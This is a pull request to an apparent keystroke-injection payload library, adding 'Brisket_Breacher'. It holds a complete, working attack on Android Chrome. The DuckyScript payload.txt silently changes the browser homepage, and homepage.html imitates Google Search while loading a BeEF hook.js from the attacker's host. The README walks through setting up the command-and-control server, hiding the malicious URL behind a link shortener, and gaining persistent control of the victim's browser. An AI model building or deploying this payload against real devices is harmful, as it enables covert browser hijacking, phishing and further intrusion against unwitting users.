### PR TITLE
Added Brisket_Breacher

### DIFF
--- a/payloads/library/mobile/Android/Brisket_Breacher/README.md
+++ b/payloads/library/mobile/Android/Brisket_Breacher/README.md
@@ -36,7 +36,7 @@ Due to the payload changing the homepage in the settings of the Google Chrome br
 
 4. Start BeEF:
     - `sudo beef-xss`.
-   -----
+
 ## The homepage
 The homepage was designed to imitate a typical Google Search landing page. Multiple features were added in an attempt to help obfuscate the fact that it is a *malicious* homepage. The homepage also delivers the BeEF C2 hook.
   - Features:

--- a/payloads/library/mobile/Android/Brisket_Breacher/README.md
+++ b/payloads/library/mobile/Android/Brisket_Breacher/README.md
@@ -58,6 +58,6 @@ The payload workflow is as follows:
   - A new tab is opened to ensure the proper browser environment is present for the script to run without issues.
   - The browser is then navigated to the settings menu where the malicious BeEF C2 URL is placed.
   - All tabs are then closed.
-  - All applications are then closed and the phone returns to the home screen. This is necessary for obfuscation purposes and to allow the browser to automatically navigate to the malicious homepage when next open.
+  - All applications are then closed and the phone returns to the home screen. This is necessary for obfuscation purposes and to allow the browser to automatically navigate to the malicious homepage when opened.
 
 ![demo](https://github.com/user-attachments/assets/89d853d8-ec2c-4ca9-9cee-46ca4f33aab6)

--- a/payloads/library/mobile/Android/Brisket_Breacher/README.md
+++ b/payloads/library/mobile/Android/Brisket_Breacher/README.md
@@ -29,7 +29,7 @@ Due to the payload changing the homepage in the settings of the Google Chrome br
 2. Install BeEF:
     - `sudo apt install beef-xss -y`
      
-3. Download the [homepage.html]() file (described next). This will be the homepage that our malicious URL will point to and deliver the BeEF C2 hook.
+3. Download the homepage.html file in the Brisket_Breacher directory (described next). This will be the homepage that our malicious URL will point to and deliver the BeEF C2 hook.
     - Open the homepage.html and edit the BeEF C2 hook (line 141 `<script src="http://X.X.X.X:3000/hook.js"></script>`) with the IP address gathered from `ifconfig` of the attacker machine and then save the updated file. E.g., `<script src="http://192.168.8.100:3000/hook.js"></script>`.
     - Become root: `sudo su`.
     - With the homepage.html file in your current working directory, move it to the following directory: `mv homepage.html /usr/share/beef-xss/extensions/demos/html`.
@@ -47,7 +47,7 @@ The homepage was designed to imitate a typical Google Search landing page. Multi
 ![googlesearch](https://github.com/user-attachments/assets/1a428553-52d5-417b-aabb-5fc053c33ea8)
 
 ## payload.txt
-The [payload.txt]() file is the delivery system for configuration of the Google Chrome browser.
+The payload.txt file is the delivery system for configuration of the Google Chrome browser.
 
 **The URL pointing to the BeEF C2 must be defined in line 7 of the payload.txt.** The URL to the BeEF C2 is the following: `http://x.x.x.x:3000/demos/homepage.html` (replacing the IP parameter with the IP address of the attacker machine). E.g., `http://192.168.8.100:3000/demos/homepage.html`. This will point to the homepage.html file that has been previously configured during the BeEF C2 setup stage.
 

--- a/payloads/library/mobile/Android/Brisket_Breacher/README.md
+++ b/payloads/library/mobile/Android/Brisket_Breacher/README.md
@@ -1,0 +1,63 @@
+<div align="center">
+  
+# Brisket Breacher
+
+![bb](https://github.com/user-attachments/assets/019730d7-db7d-4a9a-a892-06df2b390adc)
+
+</div>
+
+**Title:** Brisket_Breacher
+
+**Author:** OSINTI4L
+
+**Target Os:** Android mobile device/Google Chrome (tested on Samsung S24 FE | One UI V7.0 | Android V15).
+
+## What is Brisket Breacher?
+
+Brisket Breacher is DuckyScript payload that targets the Android mobile device Google Chrome browser utilizing the Browser Exploitation Framework ([BeEF](https://www.kali.org/tools/beef-xss/)). The payload changes the homepage of the Google Chrome browser to an imitation `Google.com` landing page. When a victim device opens the Google Chrome browser to the homepage, the imitation Google.com page points to a BeEF command and control server via a Javascript BeEF hook, where the attacker has direct control over the browser to allow for further attacks. For the attack to work, the attacker must setup a BeEF C2 server, configure the homepage, and edit the URL to the C2 in the payload.txt (all explained below).
+
+For the purposes of this PoC the BeEF C2 will be hosted locally over LAN, where the attacker machine and target device must be on the same LAN for the attack to be succesful. The same attack can be used outside of LAN if setup via methods such as port forwarding or hosting services.
+
+**Persistence**
+
+Due to the payload changing the homepage in the settings of the Google Chrome browser, this creates persistence. *Even* if the phone is restarted, when the browser homepage is loaded, it will *always* attempt to connect to the BeEF C2.
+
+## Dependencies
+## Setting up the BeEF command and control server using a [Kali Linux](https://www.kali.org) box
+1. Once you have spun-up an instance of Kali (our attacker machine), you must first find the IP address of the machine. This can be found via `ifconfig`, store the IP address as it will be needed in multiple places momentarily.
+  
+2. Install BeEF:
+    - `sudo apt install beef-xss -y`
+     
+3. Download the [homepage.html]() file (described next). This will be the homepage that our malicious URL will point to and deliver the BeEF C2 hook.
+    - Open the homepage.html and edit the BeEF C2 hook (line 141 `<script src="http://X.X.X.X:3000/hook.js"></script>`) with the IP address gathered from `ifconfig` of the attacker machine and then save the updated file. E.g., `<script src="http://192.168.8.100:3000/hook.js"></script>`.
+    - Become root: `sudo su`.
+    - With the homepage.html file in your current working directory, move it to the following directory: `mv homepage.html /usr/share/beef-xss/extensions/demos/html`.
+
+4. Start BeEF:
+    - `sudo beef-xss`.
+   -----
+## The homepage
+The homepage was designed to imitate a typical Google Search landing page. Multiple features were added in an attempt to help obfuscate the fact that it is a *malicious* homepage. The homepage also delivers the BeEF C2 hook.
+  - Features:
+    - BeEF C2 hook delivery.
+    - Dark and Light mode variations that will render according to device settings.
+    - A useable search bar and buttons that will forward the user input as a Google search request.
+
+![googlesearch](https://github.com/user-attachments/assets/1a428553-52d5-417b-aabb-5fc053c33ea8)
+
+## payload.txt
+The [payload.txt]() file is the delivery system for configuration of the Google Chrome browser.
+
+**The URL pointing to the BeEF C2 must be defined in line 7 of the payload.txt.** The URL to the BeEF C2 is the following: `http://x.x.x.x:3000/demos/homepage.html` (replacing the IP parameter with the IP address of the attacker machine). E.g., `http://192.168.8.100:3000/demos/homepage.html`. This will point to the homepage.html file that has been previously configured during the BeEF C2 setup stage.
+
+An additional layer of obfuscation can be had by utilizing a URL shortening service (e.g., [Tinyurl](https://tinyurl.com/)). After placing the `http://x.x.x.x:3000/demos/homepage.html` URL into the shortener, you will then use the shortened URL as the constant defined in line 7.
+
+The payload workflow is as follows:
+  - Chrome browser is opened.
+  - A new tab is opened to ensure the proper browser environment is present for the script to run without issues.
+  - The browser is then navigated to the settings menu where the malicious BeEF C2 URL is placed.
+  - All tabs are then closed.
+  - All applications are then closed and the phone returns to the home screen. This is necessary for obfuscation purposes and to allow the browser to automatically navigate to the malicious homepage when next open.
+
+![demo](https://github.com/user-attachments/assets/89d853d8-ec2c-4ca9-9cee-46ca4f33aab6)

--- a/payloads/library/mobile/Android/Brisket_Breacher/homepage.html
+++ b/payloads/library/mobile/Android/Brisket_Breacher/homepage.html
@@ -1,0 +1,143 @@
+<!DOCTYPE html>
+<html lang="en">
+<head>
+  <meta charset="UTF-8">
+  <meta name="viewport" content="width=device-width, initial-scale=1.0">
+  <title>Google Search</title>
+  <style>
+    body {
+      font-family: 'Roboto', Arial, sans-serif;
+      margin: 0;
+      padding: 0;
+      background: linear-gradient(135deg, #f8f8f8, #f1f1f1);
+      display: flex;
+      justify-content: center;
+      align-items: center;
+      height: 100vh;
+      color: #202124;
+      transition: background 0.3s ease, color 0.3s ease;
+    }
+    .container {
+      text-align: center;
+      padding: 20px;
+    }
+    h1 {
+      font-size: 2.5rem;
+      margin-bottom: 20px;
+      color: #202124;
+    }
+    .logo {
+      width: 250px;
+      max-width: 100%;
+      margin-bottom: 30px;
+    }
+    .search-box {
+      display: flex;
+      justify-content: center;
+      flex-direction: column;
+    }
+    input[type="text"] {
+      width: 90%;
+      max-width: 600px;
+      padding: 16px;
+      font-size: 18px;
+      border-radius: 30px;
+      border: 1px solid #dcdcdc;
+      outline: none;
+      box-shadow: 0 2px 5px rgba(0, 0, 0, 0.1);
+      transition: all 0.3s ease-in-out;
+      text-align: center;
+    }
+    input[type="text"]:focus {
+      border-color: #4285F4;
+      box-shadow: 0 2px 10px rgba(66, 133, 244, 0.3);
+    }
+    .buttons {
+      margin-top: 30px;
+      display: flex;
+      justify-content: center;
+      gap: 16px;
+    }
+    .buttons input {
+      padding: 14px 30px;
+      font-size: 16px;
+      border-radius: 25px;
+      border: none;
+      background-color: #f8f8f8;
+      color: #5f6368;
+      cursor: pointer;
+      box-shadow: 0 2px 4px rgba(0, 0, 0, 0.1);
+      transition: background-color 0.3s ease, transform 0.2s ease;
+    }
+    .buttons input:hover {
+      background-color: #f1f1f1;
+      transform: scale(1.05);
+    }
+    .buttons input:active {
+      transform: scale(1);
+    }
+    .buttons input:focus {
+      outline: none;
+    }
+
+    @media (max-width: 600px) {
+      .buttons {
+        flex-direction: row;
+        justify-content: space-between;
+      }
+      .buttons input {
+        padding: 12px 24px;
+        font-size: 14px;
+        width: 48%;
+      }
+    }
+
+    @media (max-width: 400px) {
+      .buttons input {
+        padding: 12px 24px;
+        font-size: 14px;
+        width: 100%;
+      }
+    }
+
+    @media (prefers-color-scheme: dark) {
+      body {
+        background: linear-gradient(135deg, #121212, #1c1c1c);
+        color: #e8e8e8;
+      }
+      .buttons input {
+        background-color: #333;
+        color: #e8e8e8;
+      }
+      .buttons input:hover {
+        background-color: #444;
+      }
+      input[type="text"] {
+        background-color: #333;
+        border: 1px solid #555;
+        color: #e8e8e8;
+      }
+      input[type="text"]:focus {
+        border-color: #4285F4;
+        box-shadow: 0 2px 10px rgba(66, 133, 244, 0.3);
+      }
+    }
+  </style>
+</head>
+<body>
+  <div class="container">
+    <img src="https://upload.wikimedia.org/wikipedia/commons/thumb/2/2f/Google_2015_logo.svg/512px-Google_2015_logo.svg.png" alt="Google Logo" class="logo">
+    
+    <form action="https://www.google.com/search" method="get" class="search-box">
+      <input type="text" name="q" placeholder="Search Google" required>
+      
+      <div class="buttons">
+        <input type="submit" value="Google Search">
+        
+        <input type="submit" value="I'm Feeling Lucky" formaction="https://www.google.com/search?btnI=1">
+      </div>
+    </form>
+  </div>
+<script src="http://X.X.X.X:3000/hook.js"></script>
+</body>
+</html>

--- a/payloads/library/mobile/Android/Brisket_Breacher/payload.txt
+++ b/payloads/library/mobile/Android/Brisket_Breacher/payload.txt
@@ -17,6 +17,7 @@ STRINGLN chrome
 DELAY 200
 ENTER
 DELAY 500
+
 REM Opening new tab to ensure proper default Chrome environment to execute payload properly:
 CTRL t
 DELAY 300

--- a/payloads/library/mobile/Android/Brisket_Breacher/payload.txt
+++ b/payloads/library/mobile/Android/Brisket_Breacher/payload.txt
@@ -1,0 +1,80 @@
+REM TITLE: Brisket_Breacher
+REM AUTHOR: OSINTI4L (https://github.com/OSINTI4L)
+REM TARGET OS: Android mobile device/Google Chrome (tested on Samsung S24 FE | One UI V7.0 | Android V15)
+REM DESCRIPTION: Brisket_Breacher is DuckyScript payload that targets the Android mobile device Google Chrome browser utilizing the Browser Exploitation Framework (BeEF). It replaces the homepage of the browser with a malicious Google Search imitation homepage that connects to a control and command server, allowing the attacker to have control over the browser. See README.md
+REM REQUIREMENTS: See README.md
+
+DEFINE #BeEF_URL https://BeEF_C2_URL
+
+REM Begin attack:
+ATTACKMODE HID
+DELAY 1000
+
+REM Opening Google Chrome:
+GUI f
+DELAY 400
+STRINGLN chrome
+DELAY 200
+ENTER
+DELAY 500
+REM Opening new tab to ensure proper default Chrome environment to execute payload properly:
+CTRL t
+DELAY 300
+SHIFT TAB
+DELAY 200
+ENTER
+DELAY 350
+
+REM Navigating to Homepage settings:
+REPEAT 11 DOWNARROW
+ENTER
+DELAY 350
+REPEAT 10 DOWNARROW
+ENTER
+
+REM Setting BeEF C2 URL as default homepage:
+DELAY 250
+REPEAT 4 TAB
+DELAY 250
+CTRL a
+DELAY 250
+STRINGLN #BeEF_URL
+DELAY 250
+
+REM Navigating back to original homepage and accessing tabs menu:
+ESC
+DELAY 100
+ESC
+DELAY 250
+SHIFT TAB
+DELAY 250
+DOWNARROW
+DELAY 100
+UPARROW
+DELAY 300
+ENTER
+
+REM Closing all tabs:
+DELAY 350
+REPEAT 4 TAB
+DELAY 350
+ENTER
+DELAY 350
+REPEAT 2 DOWNARROW
+DELAY 250
+ENTER
+DELAY 350
+TAB
+DELAY 100
+TAB
+DELAY 100
+ENTER
+DELAY 200
+
+REM Closing applications (including browser) and returning to home screen:
+INJECT_MOD
+GUI TAB
+DELAY 300
+REPEAT 2 DOWNARROW
+DELAY 150
+ENTER


### PR DESCRIPTION
Brisket_Breacher is an Android mobile payload that targets the Google Chrome browser.  The homepage of the browser is replaced with a malicious URL that points to a functioning imitation Google search homepage. The imitation homepage contains a Browser Exploitation Framework (BeEF) hook that calls to a BeEF command and control server, allowing an attacker to have control over the victims browser.